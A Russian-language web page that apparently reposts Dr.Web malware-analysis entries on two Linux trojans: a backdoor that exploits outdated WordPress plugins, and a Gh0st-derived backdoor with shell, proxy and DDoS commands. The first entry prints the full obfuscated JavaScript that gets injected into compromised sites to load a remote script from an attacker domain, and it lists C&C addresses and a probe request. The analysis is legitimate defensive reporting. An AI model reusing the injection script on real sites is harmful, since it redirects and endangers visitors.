Dr web linux вирусы

Linux.BackDoor.WordPressExploit.2

Троянская программа, написанная на языке Go (Golang) и работающая в среде 32- и 64-битных операционных систем семейства Linux для x86-совместимых устройств. Представляет собой бэкдор, выполняющий команды злоумышленников. Основная функция этой программы — атака сайтов на базе CMS WordPress через эксплуатацию уязвимостей в устаревших версиях плагинов и тем оформления к этой платформе. В случае успеха в веб-страницы таких сайтов инжектируется вредоносный JavaScript, выполняющий переадресацию посетителей на другие ресурсы. Бэкдор является модификацией вредоносного приложения Linux.Backdoor.WordPressExploit.1 и отличается от него адресом управляющего сервера, адресом домена, с которого загружается вредоносный скрипт, а также дополненным списком эксплуатируемых уязвимостей.

Принцип действия

Linux.Backdoor.WordPressExploit.2 управляется через команды, которые принимает от расположенного по адресу 45[.]9.148[.]48 C&C-сервера. Доступные команды:

  • — атака заданной веб-страницы (сайта);
  • wait — переход в режим ожидания;
  • letmestop — завершение работы трояна;
  • dieforme77 — остановка ведения журнала выполненных действий.

В зависимости от модификации трояна вредоносные JavaScript-файлы для инжектирования загружаются с одного из следующих доменов:

  • count[.]trackstatisticsss[.]com
  • lobbydesires[.]com
  • letsmakeparty3[.]ga
  • deliverygoodstrategies[.]com
  • clon[.]collectfasttracks[.]com

Рассматриваемый вариант Linux.Backdoor.WordPressExploit.2 использует домен count[.]trackstatisticsss[.]com .

Перед атакой заданного сайта бэкдор в тестовом режиме пытается атаковать сайт site[.]com , отправляя ему HTTP-запрос вида:

hxxp[:]//site[.]com/?action=um_fileupload&domain=test&name=test

Если в ответе в начале строки отсутствует значение s-1-s-2-s-3 , Linux.Backdoor.WordPressExploit.2 переходит к выполнению основной задачи. В противном случае он завершает свою работу.

Перед очередной атакой троян получает от C&C-сервера адрес целевого сайта, после чего пытается проэксплуатировать 28 известных уязвимостей в ряде плагинов и тем оформления WordPress. При этом для эксплуатации уязвимостей он запускает 250 отдельных процессов. Если какая-либо уязвимость не закрыта и атака прошла успешно, бэкдор информирует об этом C&C-сервер.

Читайте также:  What is root device in linux

Плагины и темы оформления, к которым троян пытается применить уязвимости:

  • WP Live Chat Support Plugin
  • WordPress – Yuzo Related Posts
  • Yellow Pencil Visual Theme Customizer Plugin
  • Easysmtp
  • WP GDPR Compliance Plugin
  • Newspaper Theme on WordPress Access Control (уязвимость CVE-2016-10972);
  • Thim Core
  • Google Code Inserter
  • Total Donations Plugin
  • Post Custom Templates Lite
  • WP Quick Booking Manager
  • Faceboor Live Chat by Zotabox
  • Blog Designer WordPress Plugin
  • WordPress Ultimate FAQ (уязвимости CVE-2019-17232, CVE-2019-17233);
  • WP-Matomo Integration (WP-Piwik)
  • WordPress ND Shortcodes For Visual Composer
  • WP Live Chat
  • Coming Soon Page and Maintenance Mode
  • Hybrid
  • Brizy WordPress Plugin
  • FV Flowplayer Video Player
  • WooCommerce
  • WordPress Coming Soon Page
  • WordPress theme OneTone
  • Simple Fields WordPress Plugin
  • WordPress Delucks SEO plugin
  • Poll, Survey, Form & Quiz Maker by OpinionStage
  • Social Metrics Tracker
  • WPeMatico RSS Feed Fetcher
  • Rich Reviews plugin

Ниже представлены списки применяемых функций-эксплойтов:

#drweb

#drweb

Цель эксплуатации — выполнить инжект следующего вредоносного скрипта в уязвимый сайт:

 var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61); // var d=document; var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); // script s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); // text/javascript var pl = u; s.src=pl; if (document.currentScript) < document.currentScript.parentNode.insertBefore(s, document.currentScript); >else < d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s); // head var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116)); // script list.insertBefore(s, list.childNodes[0]); >

В свою очередь, функция данного скрипта — внедрить полученный с сайта hxxps[:]//count[.]trackstatisticsss[.]com скрипт j.js в атакуемую страницу. Инжект происходит таким образом, что при ее загрузке скрипт получает наивысший приоритет над остальными элементами страницы и загружается самым первым. После заражения страницы при клике мышью в любом ее месте пользователи будут перенаправлены на нужный злоумышленникам сайт.

В процессе работы Linux.Backdoor.WordPressExploit.2 ведет непрерывную статистику выполняемых действий. Бэкдор отслеживает:

  • общее число атакованных сайтов;
  • все случаи успешного применения эксплойтов;
  • число успешных эксплуатаций уязвимостей в плагине WordPress Ultimate FAQ и Facebook-мессенджере от компании Zotabox.
Читайте также:  Виртуальные машины linux запущены

Кроме того, он информирует C&C-сервер обо всех выявленных незакрытых уязвимостях.

Артефакты

Linux.Backdoor.WordPressExploit.2 содержит нереализованную функциональность для взлома учетных записей администраторов атакуемых веб-сайтов через подбор логинов и паролей по имеющимся словарям (метод грубой силы или брутфорс). Данная функция могла присутствовать в более ранних модификациях трояна или запланирована для его будущих версий.

Источник

Linux.BackDoor.Dklkt.1

Троянец-бэкдор для операционной системы Linux, по задумке авторов должен реализовывать довольно обширный набор функций: SOCKS proxy-сервера, remote shell, менеджера файловой системы, однако на текущий момент большая часть команд игнорируется. Внутреннее имя троянца — «DDoS Attacker for Gh0st(sweet version 1.0)».

Судя по отладочной информации, исходные компоненты бэкдора были созданы таким образом, чтобы исполняемый файл можно было собрать как для архитектуры Linux, так и для Windows. При запуске бэкдор проверяет наличие в папке, из которой он был запущен, конфигурационного файла, содержащего следующие параметры:

'remote_host' 'remote_port' 'remote_host2' 'remote_port2' 'remote_host3' 'remote_port3' 'ServiceDllName' 'm_enable_http' 'HttpAddress' 'szGroup' 'blDelMe' 'SelfDelete' 'Config' 'PassWord' 'Remark' 'Version' 

где ‘Config’ – путь к конфигурационному файлу (в Linux) или к ветви системного реестра, где хранятся конфигурационные данные (в Windows). В конфигурационном файле задаются три адреса управляющих серверов бэкдора, однако используется им только один, в то время как два других являются резервными. Конфигурационный файл зашифрован с использованием алгоритма Base64. При запуске Linux.BackDoor.Dklkt.1 пытается зарегистрироваться на атакованном компьютере в качестве демона (системной службы), а если это не удается, бэкдор прекращает свою работу.

После запуска вредоносная программа формирует приветственный пакет с информацией о системе и параметрами бэкдора (все строки используют кодировку unicode) и передает его управляющему серверу:

|| *
MHz|Total:MB,Avail:MB|d
h m s|
||
ms|0|||||0|0|1|\x00

Параметры Remark, Group, Password, Version заимствуются из конфигурационного файла, последние три значения постоянны, остальные являются данными о зараженной системе. Трафик сжимается с использованием алгоритма LZO и шифруется алгоритмом Blowfish. Каждый пакет данных также снабжается контрольной суммой CRC32 для определения целостности полученной информации на принимающей стороне.

Читайте также:  Репозиторий oracle enterprise linux

После отправки данного пакета троянец переходит в режим ожидания поступающих от удаленного управляющего сервера команд:

Команда Комментарий
Приветственный пакет Игнорируется
Обновиться Игнорируется
Изменить группу Изменяет значение параметра Group в конфигурационном файле на значение, пришедшее в команде
Изменить remark Изменяет значение параметра Remark в конфигурационном файле на значение, пришедшее в команде
Открыть shell Открывает командный интерпретатор и перенаправляет потоки ввода/вывода на управляющий сервер
Открыть менеджер файловой системы Игнорируется
Открыть менеджер DDoS Игнорируется
Принять пользовательские данные Игнорируется
Самоудалиться Игнорируется
Разорвать связь с управляющим сервером Игнорируется
Выход Выполняет команду system(«exit»)
Перезагрузка Выполняет команду system(«reboot»)
Выключение компьютера Выполняет команду system(«poweroff»)
Очистить лог событий Игнорируется
Начать DDoS-атаку
Запустить приложение Приложение указывается в пришедшей команде
Запустить proxy Запускает на зараженной машине SOCKS proxy

Троянец может выполнять следующие виды DDoS-атак:

  • SYN Flood
  • HTTP Flood (POST/GET запросы)
  • Drv Flood (не реализовано)
  • ICMP Flood
  • TCP Flood
  • UDP Flood

Источник

Оцените статью
Adblock
detector